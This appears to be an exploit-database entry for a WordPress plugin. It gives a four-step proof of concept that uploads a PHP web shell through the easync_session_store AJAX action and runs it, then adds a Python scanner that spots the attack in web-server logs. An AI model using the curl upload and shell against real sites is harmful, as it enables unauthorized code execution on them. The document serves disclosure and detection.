## https://sploitus.com/exploit?id=WPEX-ID:ECF61D17-8B07-4CB6-93A8-64C2C4FBBE04
1. Create a malicious PHP file:

echo '<?php passthru("id");' > /tmp/evil.php

2. Upload it:

curl -H 'Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37' \
    -F 'action=easync_session_store' \
    -F 'type=car' \
    -F 'with_driver=self-driven' \
    -F 'driver_license_image2=@/tmp/evil.php' \
    'http://127.0.0.1/wp-admin/admin-ajax.php'


3. Determine the location where the shell has been uploaded (the "d_license_image" should contain the URL to it):

curl -H 'Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37' \
    'http://127.0.0.1/wp-admin/admin-ajax.php?action=easync_success_and_save'

4. Trigger the payload by accessing the determined URL, e.g.: http://127.0.0.1/wp-content/uploads/cff7779bf2268f97c011ece9fd4c9ab0.php
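
A detection check for the request sequence in steps 2 to 4, as an added example that is not part of the original write-up: it scans web-server access logs (combined log format is an assumption) for PHP-type files served successfully from /wp-content/uploads/ and raises the severity when the same client also called an easync_* AJAX action visible in the query string. The function name, sample log lines, IP addresses and file name are constructed for illustration.

```python
import re

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 58 "-" "curl/8.0"
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1" 200 912 "-" "curl/8.0"
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/uploads/0123456789abcdef0123456789abcdef.php HTTP/1.1" 200 54 "-" "curl/8.0"
198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-content/uploads/2024/01/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Jan/2024:10:02:04 +0000] "GET /wp-content/uploads/old.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# client IP, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Script extensions that a PHP handler may execute, requested from the uploads tree
UPLOAD_SCRIPT_RE = re.compile(
    r'^/wp-content/uploads/[^?]*\.(?:php\d?|phtml|phar)(?:$|[/?])', re.I)
# The two AJAX actions named in the write-up, when passed in the query string
EASYNC_ACTION_RE = re.compile(
    r'[?&]action=easync_(?:session_store|success_and_save)(?:&|$)')

def find_suspicious(log_text):
    """Return one finding per successfully served script under uploads.

    Severity is 'high' when the same client also called an easync_* action,
    'medium' otherwise (a script served from uploads is abnormal on its own).
    """
    easync_clients = set()
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, path, status = m.group(1), m.group(3), int(m.group(4))
        if path.startswith('/wp-admin/admin-ajax.php') and EASYNC_ACTION_RE.search(path):
            easync_clients.add(ip)
        elif UPLOAD_SCRIPT_RE.match(path) and status < 400:
            hits.append((ip, path, status))
    # Severity is assigned after the full pass so request order does not matter.
    return [{"ip": ip, "path": path, "status": status,
             "severity": "high" if ip in easync_clients else "medium"}
            for ip, path, status in hits]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

The upload in step 2 sends its action in the POST body, which a standard access log does not record, so the medium-severity finding is the one that still fires when only the final request is visible.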